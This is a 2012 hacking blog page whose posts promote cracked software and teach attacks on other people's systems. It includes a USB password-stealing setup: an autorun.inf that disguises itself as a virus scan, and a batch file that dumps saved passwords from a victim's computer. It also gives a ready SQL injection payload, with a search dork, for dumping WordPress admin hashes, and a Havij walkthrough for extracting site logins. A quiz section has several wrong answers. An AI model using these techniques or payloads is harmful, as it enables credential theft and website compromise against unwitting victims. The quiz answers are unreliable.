bolsas femininas

SQl tutorials

Here is the tutorial for hacking website which is vulnerable to SQL injection

SQL injection Tool Havij1.52 pro

Here you can learn how to hack sql vulnerable site with the toll name " HAVIJ"

Full Cracked Antivirus

Here you can get all fully crackrd antivirus

If you are going [...]

Fully Cracked IDM all version

Her you get all the cracked Version Of Internet Download Manager

All Hacking E-Books

Download all hacking Ebooks for free... All network security and E|CEH book

Showing posts with label Computer Security. Show all posts
Showing posts with label Computer Security. Show all posts

Monday, May 28, 2012

Windows 7 Product Key

Windows 7 Product Key


Hey guys as I have got many request and many of them asking question to make their windows geniune.
So today I will give you Windows 7 product key..
If you want to make your windows geninue then use these key..


Goto Here To Download The key  



The File Contains Password.. and If you want the password then comment on the post and share this to 15 facebook group and othere social networks..

Dont try to cheat rember we have a eye on every one...

If you like my post then please comment to appreciate my work.. thanks

Note: use with your own risk

By Blog Admin with 9 comments

Friday, May 25, 2012

How to Steal password using your USB pen drive

How to Steal  password using your USB pen drive

hack with your usb drive


You can Grab all the username and password from other or your friends computer just by using your Pen Drive...
Ya your pendrive work as a password stealer.

You can grab or steal all the username and password that have been saved on the browser.

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE, chrome and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to SNIFF Password from any computer. 

We need the following tools to create our rootkit.

Notice: You Must Diasable your Antivirus for creating a USB Sniffer.

Download these Five tools first.
1.Mail Passview
2.IE Passview
3.MessenPass
4.Password Fox
5.Protected Storage Passview

After Downloading these tools , just copy the mspass.exe, | mailpv.exe, |  iepv.exe, |  pspv.exe |  and passwordfox.exe | files and save it on your USB drive.



Now open your notepad and type or copy the following text in it.

[autorun]open=launch.bat
ACTION= Perform a Virus Scan

And now save the notepad as autorun.inf on your USB Drive.

Now Again oper your notepad and type

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

And save the notepad as launch.bat , now copy the launch.bat on to yourUSB Drive. 


Now Insert the USB on your pc, then autorun pop up appears , click on perform virus scan then the passwords which are saved on your pc will be stored in a USB Drive.

Enjoy......
Please Comment IF you like my post....

By Blog Admin with 5 comments

Wednesday, May 23, 2012

Super Hide IP v3.2.1.2 Full version Free Downlaod

Super Hide IP v3.2.1.2 Full version Free Downlaod




Hello Frnds Today m give you A Full Version Ip Hider Softwere Free off Cost So enjoy this.

Anonymous Surfing with Super Hide IP
Protect your privacy on the Internet. Use Super Hide IP to surf anonymously, prevent hackers from monitoring your online activities or identity thieves from stealing your identity and other personal information, send anonymous email, and un-ban yourself from forums or restricted websites.


With Super Hide IP, you are able to be assigned one of our fake IP addresses which can be from different countries such as United States, United Kingdom, France, etc. Super Hide IP works with Internet Explorer, Firefox, Opera, Maxthon, MyIE and is compatible with all types of routers, firewalls, home networks, wireless networks and any other kind of Internet.





SuperHide Ip is the best tool to hide your ip address. It is simple and safe to use.

Key Features...

- Anonymous Web Surfing
Click Hide IP button and you will be assigned random IP addresses, preventing others from getting your true IP when surfing the Internet.
- Protect Your Identity
Surf anonymously to prevent others from monitoring your web activity or intercepting your personal information such as your financial information.
- Choose IP Country
You can select to use IP from different countries via “Choose IP Country” option and can Check IP directly.
- Send Anonymous E-mails
Hide your IP in E-mail headers. Be protected while sending e-mails via Yahoo!, Hotmail, GMail.
- Un-ban Yourself from Forums and Restricted Websites
Use Super Hide IP to change your IP which allows you to access any forums or websites that has restricted you.

Download It from HERE

By Blog Admin with 4 comments

Thursday, May 10, 2012

SQL POIZON V1.1 - SQLI EXPLOIT SCANNER, HUNTER RESEARCH, INJECTION TOOL BUILDER

SQL POIZON V1.1 - SQLI EXPLOIT SCANNER, HUNTER RESEARCH, INJECTION TOOL BUILDER





New features:
"Look n Feel" is more appealing now.
Rich Context Menu "items.
"Results" contain check boxes to activate the selection.
"Selected Dork" box is now editable for user convenience.
Built-in browser to "Injection Builder" to check the impact of the injection.
"The text of the bucket," available for "Injection Builder" to save the extra data.
"Sort By Insert button is added" Injection Builder. "
"Internet Browser" with the HTML DOM Tree and Snapshot.


Bug fixes:
It wont get stuck after pressing the stop button. Just wait a minor can occur what is right.
Progress bar for "Crawler" was corrected. It will show the progress right now.
Error in the import file has been corrected. You can import files from other directories.
"Searchqu" shows invalid results. He has since been corrected.

Download it from Here
                                         

                                                               OR


Happy Hacking ......
 


By Blog Admin with No comments

Friday, April 6, 2012

Download Proxy Switcher Standard: Free IP Changer | Hide your IP

Download Proxy Switcher Standard: Free IP Changer | Hide your IP

Proxy Switcher Standard – Free IP Changer: 
Proxy Switcher is one of the best proxy softwares ever made and it is a perfect free IP Changer tool. This software automatically downloads and tests all proxy servers. So, you don’t need to search for any “free proxy list” on Google. This software can also automatically change your IP address every 5 minutes or so (available in Pro version) which makes it really useful.


Steps to use Free IP Changer:
1. Free download Proxy Switcher Standard to hide your IP address.

Download From HERE or HERE
Password: www.umerrock.co


2. Go to Whatismyip.com and check your IP address.
3. Run and install this Free IP Changer software on your computer. Proxy Switcher will automatically start downloading and testing for “Live Proxy servers” as shown.


4. After it has tested all proxy servers, hit on “Basic Anonymity”. Here, you will get a list of all working “Alive Proxy servers”. Looking at the response time, choose 4-5 proxy servers (or even more, if required) with lowest Response Time and move these proxy servers to “Proxy Switcher” folder. You can use the highlighted button in top bar to move these proxy servers.



5. In Proxy Switcher folder, select the proxy server with minimum response time and hit on button highlighted in below image. Proxy Switcher will start using this Proxy server as your IP address.


Now, go to Whatismyip.com and check your IP address. You will find it different from Step 1. Thus, this Free IP Changer software has done the job for you.
Also, whenever you wish to change your IP Address, simply right click on Proxy Switcher icon in taskbar and select any proxy server you want.




Configuring Firefox to use Proxy Switcher:

If you’re using Firefox, you need to configure Firefox to use proxy server from this Free IP changer software.
6. After completing Step 5, open you Firefox. Go to Tools ->Options. Hit on Advanced ->Network Tab and then Settings to get this:

                                                      

7. Enter, the information as below:
HTTP Proxy: localhost
Port: 3128
as shown in image.
Hit on OK. Now, Firefox will start using proxy server specified by Proxy Switcher software.
Thus, you are successful in hiding your Ip Address using this Free IP changer software. There are many suchfree IP Changer softwares available on web. I’ll be reviewing best of them in my coming articles.
Got stuck in setting up Proxy Switcher software??? No probs, simply share your reactions in comments. I am always there to help you.
Enjoy free IP Changer software to hide your IP address…

By Blog Admin with No comments

Monday, March 12, 2012

Hack WordPress Blog in easy way

Hack WordPress Blog in easy way





In this tutorial I am going to show you how to hack wordpress blog in easy was so just follow the simple steps.

1. Open google and search inurl:"fbconnect_action=myhome"

2. Now open any link from the search result .

3. After opening the link just change this part of the URL ?fbconnect_action=myhome&userid= with this

?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z​0mbyak,7,8,9,10,11,12+from+wp_users--

after that just hit enter you will see the admin id and hash (see the bellow snapshot ) now just decrypt the hash with md5 cracker and you have done !



By Blog Admin with 1 comment

Sunday, February 26, 2012

AFCEH Exam Question and Answer

AFCEH Exam Question and Answer

1.How can you protect your IP Address while Surfing?
Google Language Translator
Web Based Proxy
Proxy Chains
Any two of the above
All of the above
Ans -5. All of the above


2.You receive a phone call on your cell phone from another Indian cell phone number.How can you trace the number?
There are tools available on the internet that will tell you the state in india where the cell phone is registered.
You can use Trace Route Tool.
You can install a firewall on your cell phone,which will record the IP adress of teh other cell phone.
It depends upon whether you have a post paid or pre paid connection.
It depends on how faar you are from a cell phone tower.


Ans -1. There are tools available on the internet that will tell you the state in india where the cell phone is registered.


3.What is the countermeasure to Brute Force Password Cracking?
Ensure that password is long.
Ensure that password has symbols.
Ensure that SSL encryption us used for Web application accessing the password.
Ensure that CAPTCHA is implemented.
Ensure that digital signature are using.




Ans -4. Ensure that CAPTCHA is implemented.
4.How can you steal files from a local machine when you don't know the Windows login password of that machine? Suggest a technique that will attract the least attention from the victim.
Password cracking tool.
Keylogger.
Data Sniffer.
Linux LIVE CD.
Serial Numbers.
Ans -4. Linux LIVE CD.


5.Let us assume you are communicating with two different people A and B.Both A and B on the same remote network.When you try to find out their IP address on your system,can they have the same IP address?
Yes
No.
Maybe
Only if they are using a proxy server.
Ans -1. Yes


6.How can an email server detect spoofed emails?
Reverse DNS lookup of the Sender's IP address.
Map Sender's IP address to domain.


Blacklist certain sender IP addresses.
Email header analysis.
Keyword based filtering.
Ans -2. Map Sender's IP address to domain.


7.What makes the Stacheldraht attack tool so difficult to counter?
It uses single key encryption.
It communicates using ICMP.
Its default port numbers can be changed.
It uses a very large number of simultaneous attackers.
All of the above.
Ans -5. All of the above.


8.What is HTTP tunneling?
A secure way of communication.
Working with any protocol transmitting it through http.
VPN
None of the above.
Ans -2. Working with any protocol transmitting it through http.


9.How to prevent infection by virus through Facebook?
When an unknown person adds you,do not accept request.
When an unknown person sends you a private message,do not open it.
When you are prompted to downlod something,do not accept it.
When you are to join a group,do not accept it.


When you are prompted to enter your personal details.
Ans -3. When you are prompted to download something,do not accept it.


10.Are switching networks vulnerable to sniffers?
No since only those data packets meant for a host reach the NIC.
Yes.
Don't know.
Depends upon the operating system.
I searched on Google but could not find the answer.
Ans -2. Yes


11.Whenever you create a new email account or social networking website account or any other online account,why are you asked to re-type some characters that are shown as an image on the website?
To fight piracy.
to fight viruses,worms and trojans.
To prevent users from creating multiple accounts.
To fight spammers and automatic scripts.
To ensure that the user can type properly.
Ans -4. To fight spammers and automatic scripts.


12.Decode DOCT to its plaintext format:
COAT
BOAT
DAFT
MEAT
SEAT
Ans -2. BOAT


13.While trying to change the signature of a Trojan you ended increasing few bytes in the hex file. What will be the result?
The Trojan file will crash altogether.
The Trojan will work and get undetected by the antivirus.
Addition of few bytes won't make much difference
Nothing will happen.It will ignore those bytes.
Ans -1. The Trojan file will crash altogether.


14.When you use the ipconfig command then your IP address is shown to be X,while when you visit www.whatismyip.com then your Ip address is shown to be Y.Which is your internal IP address and which is your external IP address?
X is Internal,Y is External.


Y is Internal,X is External.
Both are External.
Depends on whether proxy server is being used or not.
Depends on whether there is a firewall or not.
Ans -1. X is Internal,Y is External.


15.Convert ZEBDG into plaintext
Big Guy Dog Fun India
AFCEH
ANKIT
FADIA
YOURS
Ans -2. AFCEH


16.If you are the system administrator of a college and want to block use of peer to peer file sharing software,then what do you need to do?
Prevent use of cookies.
Block certain ports.
Block certain IP addresses.
Block certain protocols.
Block certain keywords.
Ans -2. Block certain ports.


17.What is most important from below for a sucessful Man in Middle attack?
Hijack one of the computers.
Data must pass through your computer.
Sniffed Session ID.


Sequence Number Prediction.
Time out should take place.
Ans -3. Sniffed Session ID.


18.What is a good countermeasure against Land attacks?
Patch your Operating System.
Disable all fake data packets.
Disable all ports.
Disable trust relationship based connections.
All of the above.
Ans -1. Patch your Operating System.


19.Which of the below is the most foolproof technique for regulating access to a file on a local system?
Password protected file.
Encrypted file.
Mounted Virtual Encrypted Drive.
USB Dongle.
Virtual Keyboard.
Ans -4. USB Dongle.


20.What is the main difference between Ophcrack and Offline NTPassword and Registry Editor?
Ophcrack is slow,Offline is fast
Ophcrack changes the password,Offline resets the password.
Ophcrack cracks the password,Offline resets the password.
Ophcrack resets the password,Offline cracks the password.


Ophcrack changes the password,Offline cracks the password
Ans -3. Ophcrack cracks the password,Offline resets the password.


21.Decode CNRJG to its plaintext format:
AFCEH
ANKIT
FADIA
APPLE
ALONE
Ans - 4. APPLE


22.How is connection terminated in TCP/IP?
A sends FIN/ACK to B.B sends a FIN/ACK to A.A sends an ACK to B.
A sends FIN to B.B sends a FIN/ACK to A.A sends an ACK to B.
A sends FIN to B.B sends a FIN to A.A sends an ACK to B.
A sends FIN to B.B sends an ACK to A.A sends an ACK to B.
A sends FIN/ACK to B.B sends an ACK to A.A sends an ACK to B.
Ans -2. A sends FIN to B.B sends a FIN/ACK to A.A sends an ACK to B.


23.Convert the following text Base64 into its equivalent Base64 Encoded text:
QmFzZTY0
QmFzZTY1
QmFzZTY2
QmFzZTY3
QmFzZTY5
Ans -1. QmFzZTY0


24.Why is it important to password protect the BIOS?
To prevent data theft.
To prevent passwords getting cracked.
To prevent systems settings from being changed
To prevent virus infection.
All of the above.
Ans -5. All of the above.


25.If you want to steal the data from a password protected computer,what is the best technique?
Brute Force.
InstallData Sniffer on another computer on same network.
War Driving.
Live CD.
Trojans.
Ans -4. Live CD.


26.How can you find whether the target computer is a Honeypot or not?
Nmap
ICMP Scanning
Ping Sweeping
Manual Hit & Trial
Honeypotscan.pl
Ans -4. Manual Hit & Trial


27.Usually when you port scan your home computer,you will find that some ports are open?Why?
There are daemons running on these open ports.
There are Trojans,spyware and keyloggers installed on these open ports.
The applications running o your system are using these open ports.
An attacker might be connecting to your system.
I don't know.
Ans -3. The applications running o your system are using these open ports.


28.How can you find out a remote computer's MAC address?
Windows Registry.
Netstat.
Data Sniffer.
Etherchange tool.
Ping.
Ans -3. Data Sniffer.


29.If your company or college is using software to monitor all your activities on your desktop computer,then what can you do to stop the monitoring?
Disable the Firewall
Disable the Sniffer.
Disable the Trojan.
Use Encryption.
HTTP Tunnelling
Ans -5. HTTP Tunnelling


30.In the CAPTCHA system,why are backgrounds of different colors?
To prevent Brute Force cracking.
To prevent spam.
To prevent spoofing.
To prevent sniffing tools.
To prevent OCR tools from working.
Ans -5. To prevent OCR tools from working.


31.You have Norton antivirus installed on your system. You scanned a trojan file and after altering the signature found that it is not being detected by Norton Now you send it to the victim where where it was caught by the antivirus what could be the possible explaination?
Your antivirus is not workng properly.
Your antivirus is not properly updated.
The victim is using some other antivirus.
There has been a binary editor in teh transit making teh fiel detectable again.
Ans -3. The victim is using some other antivirus.


32.Analyze the below email headers and determine the source IP address of the system that was used to send the email :
69.147.64.132
66.218.66.82
216.252.122.217
61.1.127.224
66.218.66.82
Ans -1. 69.147.64.132


33.Convert BGDFI into correct plaintext:
Big Guy Dog Fun India
AFCEH
ANKIT
FADIA
YOURS
Ans -2. AFCEH


34.What are persistent XSS attacks?
When the XSS attack continues for a long period of time.
When the XSS attack continues on multiple servers.
When the data entered by the attacker gets stored on the target and can be accessed later as well.
When the data by the attacker infects other computers on the same network
Ans -4. When the data by the attacker infects other computers on the same network.


35.If you want to prevent malicious attacks (that originate inside your network) from leaving your network,then what would you recommend?
Software based Firewall.
Hardware based Firewall.
Data Sniffer.
Reverse DNS Trace.
Proxy Server
Ans -1. Software based Firewall.


36.Imagine that you are working in an organization.You use Endora Pro to acess your email.If you are quitting you job nad want a copy of all your emails,then what is teh best thing to do?
Forward all emails to your personal account.
Copy and paste the tect from your email sto a word file.
Connect your personal computer to the mail server and download all emails to it.
Copy the Eudora Pro folder.
Copy the Systems folder.
Ans -4. Copy the Eudora Pro folder.


37.What is a good countermeasure to phishing?
Firewall
URL ANalysis
Hardware Device.
Awarness.
Digital Certificate of the page.
Ans -3. Hardware Device.


38.Whats is the correct way to use p0f when target system is www.abc.com?
Run p0f and the visit www.hotmail.com.
Run p0f and then trace route to www.abc.com.
Run p0f and then ping www.abc.com.
Visit www.abc.com and then run p0f.
Ping www.abc.xom and then run p0f.
Ans -3. Run p0f and then ping www.abc.com.


39.If you wish to commit a perfect a cyber crime,then which of the following would do?
Spoof your MAC address.
Connect to a proxy server.
Use an Internet Cafe.
All of the above.
Any two of the first three options.
Ans -4. All of the above.


40.A criminal sends you an email.You use email header analysis and traceroute to trace the IP address of the criminal.Which of the following statements is true?
The IP address is registered to the criminal.
The IP address is registered to the ISP of the criminal.
The IP address is registered to the company where the criminal works.
All of the above could be true.
Any two from the first three options could be true.
Ans -4. All of the above could be true.


41.How can you detect that a SYN Flood attack is taking place?
netstat
ipconfig
firewall
fport
Honeypot
Ans -1. netstat


42.Convert 101001101100100001 into plaintext form:
170785


240585
160685
121285
01018
Ans -1. 170785


43.If you have physical access to a Windows system which has a login password,then what is the fastest & most efficient way to steal data from the local hard drive?
Crack the Windows login password.
Do a security audit&hack into system from internal network.
Boot into Unix Live CD.
Use Biometric Cracks.


Steal HDD physically.
Ans -3. Boot into Unix Live CD.


44.How can you protect yourself against Clipboard theft while visiting websites?
Zone Alarm Firewall.
Update your browser.
Disable Scripting Languages.
Update Microsoft Windows.
Use a good Antivirus.
Ans -3. Disable Scripting Languages.


45.Why do you think array bound checking on input is an important aspect of secure programming?
Protects against Integer Overflows.
Protects against Format String Overflow.
Protects against Cross Site Scripting Attack.
Protects against SQL Injection.
Protects against piracy.
Ans -1. Protects against Integer Overflows.


46.For a website,what is the best way to protect their visitors from key loggers?
Antivirus Software.
Highest Browser Security Settings.
Antispyware software.
Secure Auditing.
Virtual Key-logger.
Ans -5. Virtual Key-logger.


47.When you telnet to the POP port on the target computer,which port you could be connecting to?
Port 110 or Port 25
Port 80 or Prot 1110
Port 8080 or Port 1234
One of the above.
All of the above.
Ans -5. All of the above.


48.How can you find the most visited websites on the network?
Untangle
Zone Alarm
www.anonymizer.com
Snort
Tripwire
Ans -1. Untangle


49.Which of the below is the most foolproof technique of detecting a cookie tracker?
Antivirus
PrevX
Tripwire
Mozilla
Firewall
Ans -3. Tripwire


50.When you port scan a target system,the port scanner shows that the ports:15,79,110,443 are open.What does that mean?
Port 15,79,110 and 443 are open.
Port 15,79,110 and 443 are closed.
Other ports could be open too.
Target system is running a Windows based platform.
Ans -3. Other ports could be open too.

By Blog Admin with 2 comments

Wednesday, February 22, 2012

SQL Injection Tutorial With Havij


SQL Injection Tutorial With Havij



According to a survey the most common technique of hacking a website is SQL Injection. SQL Injection is a technique in which hacker insert SQL codes into web Forum to get Sensitive information like (User Name ,Passwords) to access the site and Deface it. The traditional SQL injection method is quite difficult, but now adays there are many tools available online through which any script kiddie can use SQL Injection to deface a website, because of these tools websites have became more vulnerable to these types of attacks.

One of the popular tools is Havij, Havij is an advanced SQL injection tool which makes SQL Injection very easy for you, Along with SQL injection it has a builtin admin page finder which makes it very effective.

             And
Download latest Havij 1.5 not Cracked From Here
Warning - This article is only for education purposes, By readingthis article you agree that HWP is not responsible in any way for any kind of damage caused by the information provided in this article.

Supported Databases With Havij

MsSQL 2000/2005 with error.

MsSQL 2000/2005 no error union based

MySQL union based

MySQL Blind

MySQL error based

MySQL time based

Oracle union based

MsAccess union based

Sybase (ASE)


Demonstration

Now i will Show you step by step the process of SQL injection.

Step1: Find SQL injection Vulnerability in tour site and insert the string (like http://www.target.com/index.asp?id=123) of it in Havij as show below.


Step2: Now click on the Analyse button as shown below.


Now, if the your Server is Vulnerable the information about the target will appear and the columns will appear like shown in picture below:


Step3: Now click on the Tables button and then click Get Tables button from below column as shown below:


Step4: Now select the Tables with sensitive information and click Get Columns button.After that select the Username and Password Column to get the Username and Password and click on the Get Table button.

Countermeasures:

Here are some of the countermeasures you can take to reduce the risk of SQL Injection

1.Renaming the admin page will make it difficult for a hacker to locate it

3. One of the best method to protect your website against SQL Injection attacks is to disallow special characters in the admin form, though this will make your passwords more vulnerable to bruteforce attacks but you can implement a captcha to prevent these types of attack.


Download SQL Strings here

By Blog Admin with No comments

    • Popular
    • Categories
    • Archives

     
    Blogger Wordpress Gadgets Twitter Bird Gadget